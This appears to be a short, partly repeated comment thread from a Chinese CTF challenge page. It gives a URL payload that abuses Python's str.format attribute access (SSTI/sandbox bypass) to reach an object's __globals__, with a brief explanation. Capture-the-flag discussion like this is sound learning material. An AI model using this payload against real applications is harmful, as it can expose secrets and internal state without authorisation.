bhgctfon @ 2023-11-07 23:23:20 👍1
构造payload ?f1ag=1&exp={0.__class__.__init__.__globals__}
yUjdjasdjJ_ @ 2023-09-07 23:23:20 👍0
这题有点抽象啊
构造payload ?f1ag=1&exp={0.__class__.__init__.__globals__}
这题有点抽象啊
SSTI和沙箱绕过。python的format函数的格式化字符串可以读取成员属性的特性,我们只需通过一个调用链来获取一个函数类并读取它的__globals__属性即可。payload:{0.__class__.__init__.__globals__}